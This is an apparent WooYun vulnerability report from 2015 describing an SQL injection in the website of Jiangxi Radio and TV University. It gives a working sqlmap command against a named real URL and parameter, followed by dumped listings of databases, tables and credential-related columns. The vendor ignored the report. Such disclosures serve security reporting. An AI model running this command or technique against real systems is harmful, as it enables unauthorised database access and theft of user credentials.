当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130978

漏洞标题:江西广播电视大学主站SQL注射

相关厂商:江西广播电视大学

漏洞作者: 冷白开。

提交时间:2015-08-04 13:22

修复时间:2015-08-09 13:24

公开时间:2015-08-09 13:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

江西广播电视大学SQL注射

详细说明:

注射命令sqlmap.py -u "http://www.jxrtvu.edu.cn/Service/GetSchoolOverview.ashx?TYPEID=" --dbs

S1.png

随便脱点数据给你们看

Database: jxdd
[52 tables]
+-----------------------+
| IS_Type |
| SYS_USERLOG |
| Sys_Log |
| TE_Activity |
| TE_Ads |
| TE_Contact |
| TE_DTJL |
| TE_DateDic |
| TE_Dept |
| TE_DeptNewsType |
| TE_LINK |
| TE_News |
| TE_Role |
| TE_RoleMenu |
| TE_RoleUser |
| TE_SalaryFL |
| TE_SalaryGT |
| TE_SalaryGZ |
| TE_SalaryJX |
| TE_SignUp |
| TE_SignUpTime |
| TE_SubsitePic |
| TE_TK |
| TE_TKLB |
| TE_User |
| TE_UserDeptNewsType |
| TE_VideoNews |
| View_Contact |
| View_DTJL |
| View_Dept |
| View_DeptNewsType |
| View_ISType |
| View_LINK |
| View_News |
| View_News_Pic |
| View_Role |
| View_RoleUser |
| View_SalaryFL |
| View_SalaryGT |
| View_SalaryGZ |
| View_SalaryJX |
| View_Sys_log |
| View_TE_Activity |
| View_TE_DateDic |
| View_TE_NewsAudit |
| View_TE_SignUp |
| View_TE_SubsitePic |
| View_TK |
| View_TKLB |
| View_User |
| View_UserDeptNewsType |
| View_VideoNews |
+-----------------------+
Database: jxdd1005
[28 tables]
+---------------------+
| D99_CMD |
| D99_Tmp |
| IS_Type |
| SYS_USERLOG |
| Sys_Log |
| TE_Activity |
| TE_Contact |
| TE_DTJL |
| TE_DateDic |
| TE_Dept |
| TE_DeptNewsType |
| TE_LINK |
| TE_News |
| TE_Role |
| TE_RoleMenu |
| TE_RoleUser |
| TE_SalaryFL |
| TE_SalaryGT |
| TE_SalaryGZ |
| TE_SalaryJX |
| TE_SignUp |
| TE_SignUpTime |
| TE_SubsitePic |
| TE_TK |
| TE_TKLB |
| TE_User |
| TE_UserDeptNewsType |
| TE_VideoNews |
+---------------------+
Database: jxddtest
[28 tables]
+---------------------+
| IS_Type |
| SYS_USERLOG |
| Sys_Log |
| TE_Activity |
| TE_Contact |
| TE_DTJL |
| TE_DateDic |
| TE_Dept |
| TE_DeptNewsType |
| TE_LINK |
| TE_News |
| TE_Role |
| TE_RoleMenu |
| TE_RoleUser |
| TE_SalaryFL |
| TE_SalaryGT |
| TE_SalaryGZ |
| TE_SalaryJX |
| TE_SignUp |
| TE_SignUpTime |
| TE_SubsitePic |
| TE_TK |
| TE_TKLB |
| TE_User |
| TE_UserDeptNewsType |
| TE_VideoNews |
| person_backup |
| test |
+---------------------+
Database: msdb
[141 tables]
+-----------------------------------------------------------+
| MSdbms |
| MSdbms_datatype |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfile |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| syscollector_blobs_internal |
| syscollector_collection_items_internal |
| syscollector_collection_sets_internal |
| syscollector_collector_types_internal |
| syscollector_config_store_internal |
| syscollector_execution_log_internal |
| syscollector_execution_stats_internal |
| syscollector_tsql_query_collector |
| sysdac_history_internal |
| sysdac_instances_internal |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysjobstepslogs |
| sysmail_account |
| sysmail_attachments |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_log |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profile |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_server |
| sysmail_servertype |
| sysmaintplan_log |
| sysmaintplan_logdetail |
| sysmaintplan_subplans |
| sysmanagement_shared_registered_servers_internal |
| sysmanagement_shared_server_groups_internal |
| sysnotifications |
| sysoperators |
| sysoriginatingservers |
| syspolicy_conditions_internal |
| syspolicy_configuration_internal |
| syspolicy_execution_internal |
| syspolicy_facet_events |
| syspolicy_management_facets |
| syspolicy_object_sets_internal |
| syspolicy_policies_internal |
| syspolicy_policy_categories_internal |
| syspolicy_policy_category_subscriptions_internal |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_internal |
| syspolicy_system_health_state_internal |
| syspolicy_target_set_levels_internal |
| syspolicy_target_sets_internal |
| sysproxies |
| sysproxylogin |
| sysproxysubsystem |
| sysschedules |
| syssessions |
| sysssislog |
| sysssispackagefolders |
| sysssispackages |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers |
| systaskids |
| sysutility_mi_configuration_internal |
| sysutility_mi_cpu_stage_internal |
| sysutility_mi_dac_execution_statistics_internal |
| sysutility_mi_session_statistics_internal |
| sysutility_mi_smo_objects_to_collect_internal |
| sysutility_mi_smo_properties_to_collect_internal |
| sysutility_mi_smo_stage_internal |
| sysutility_mi_volumes_stage_internal |
| sysutility_ucp_aggregated_dac_health_internal |
| sysutility_ucp_aggregated_mi_health_internal |
| sysutility_ucp_computer_cpu_health_internal |
| sysutility_ucp_computers_stub |
| sysutility_ucp_configuration_internal |
| sysutility_ucp_cpu_utilization_stub |
| sysutility_ucp_dac_file_space_health_internal |
| sysutility_ucp_dac_health_internal |
| sysutility_ucp_dacs_stub |
| sysutility_ucp_databases_stub |
| sysutility_ucp_datafiles_stub |
| sysutility_ucp_filegroups_stub |
| sysutility_ucp_filegroups_with_policy_violations_internal |
| sysutility_ucp_health_policies_internal |
| sysutility_ucp_logfiles_stub |
| sysutility_ucp_managed_instances_internal |
| sysutility_ucp_mi_database_health_internal |
| sysutility_ucp_mi_file_space_health_internal |
| sysutility_ucp_mi_health_internal |
| sysutility_ucp_mi_volume_space_health_internal |
| sysutility_ucp_policy_check_conditions_internal |
| sysutility_ucp_policy_target_conditions_internal |
| sysutility_ucp_policy_violations_internal |
| sysutility_ucp_processing_state_internal |
| sysutility_ucp_smo_servers_stub |
| sysutility_ucp_snapshot_partitions_internal |
| sysutility_ucp_space_utilization_stub |
| sysutility_ucp_supported_object_types_internal |
| sysutility_ucp_volumes_stub |
+-----------------------------------------------------------+
Database: master
[6 tables]
+-----------------------+
| MSreplication_options |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
+-----------------------+
Database: ReportServer
[34 tables]
+---------------------------+
| ActiveSubscriptions |
| Batch |
| CachePolicy |
| Catalog |
| ChunkData |
| ChunkSegmentMapping |
| ConfigurationInfo |
| DBUpgradeHistory |
| DataSets |
| DataSource |
| Event |
| ExecutionLogStorage |
| History |
| Keys |
| ModelDrill |
| ModelItemPolicy |
| ModelPerspective |
| Notifications |
| Policies |
| PolicyUserRole |
| ReportSchedule |
| Roles |
| RunningJobs |
| Schedule |
| SecData |
| Segment |
| SegmentedChunk |
| ServerParametersInstance |
| ServerUpgradeHistory |
| SnapshotData |
| Subscriptions |
| SubscriptionsBeingDeleted |
| UpgradeInfo |
| Users |
+---------------------------+
Table: SYS_USERLOG
[90 columns]
+---------------------------------+-------------+
| Column | Type |
+---------------------------------+-------------+
| adminname | non-numeric |
| allowviewlog | numeric |
| ana_codice | non-numeric |
| artikel_id | non-numeric |
| auth_id | non-numeric |
| beneficiarioid | non-numeric |
| bloc_row | non-numeric |
| blog_id | numeric |
| brend | non-numeric |
| cd | non-numeric |
| codigo | non-numeric |
| comment5 | non-numeric |
| comune | non-numeric |
| content_id | non-numeric |
| context | non-numeric |
| del_flg | non-numeric |
| distconnectorid | non-numeric |
| endstateid | non-numeric |
| freewaylogin | non-numeric |
| id_breve | non-numeric |
| id_servico | non-numeric |
| idcliente | numeric |
| iddiscipline | non-numeric |
| idevent | non-numeric |
| idoggetto | non-numeric |
| idprovenienza | non-numeric |
| idtipologiaservizio | non-numeric |
| itemno | non-numeric |
| jcode | non-numeric |
| jeda | non-numeric |
| jfcategories | non-numeric |
| job_s_date | non-numeric |
| l_col_list | numeric |
| layer | non-numeric |
| lbl_aom_unaccessible_shipmethod | non-numeric |
| level | non-numeric |
| mealid | non-numeric |
| meetingid | non-numeric |
| mod_freeway_products | non-numeric |
| modify_date | non-numeric |
| myname | non-numeric |
| mypassword | non-numeric |
| newnotices | non-numeric |
| orecchini | numeric |
| ostdate | non-numeric |
| parent_id | non-numeric |
| passe | non-numeric |
| permission | numeric |
| pfs_id | numeric |
| prc_sconto4 | non-numeric |
| prenom | numeric |
| price01 | non-numeric |
| progetto | non-numeric |
| provincial | non-numeric |
| schedaid | non-numeric |
| secid | non-numeric |
| serverid | non-numeric |
| sessionid | non-numeric |
| settingsid | non-numeric |
| sot_utente_e | non-numeric |
| st_id | non-numeric |
| statechangeid | non-numeric |
| store2 | non-numeric |
| store3 | non-numeric |
| student_number | non-numeric |
| sub_image1 | non-numeric |
| sub_large_image4 | non-numeric |
| temppass | non-numeric |
| ten | non-numeric |
| term_id | non-numeric |
| top | non-numeric |
| uname | non-numeric |
| uno | non-numeric |
| user_ip | non-numeric |
| user_level | non-numeric |
| user_nm | non-numeric |
| user_pwd | non-numeric |
| user_uname | non-numeric |
| user_usernm | non-numeric |
| user_usernun | non-numeric |
| usrn | non-numeric |
| usrpass | non-numeric |
| ustawienie | non-numeric |
| vm_manufacturer | non-numeric |
| vm_manufacturer_category | non-numeric |
| vot_proposta_e | non-numeric |
| weblinks | non-numeric |
| xadvogado | non-numeric |
| xmetodo_atualizacao | non-numeric |
| yonghu | non-numeric |
+---------------------------------+-------------+

不继续了太晚了,睡觉去喽

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-09 13:24

厂商回复:

最新状态:

暂无


漏洞评价:

评论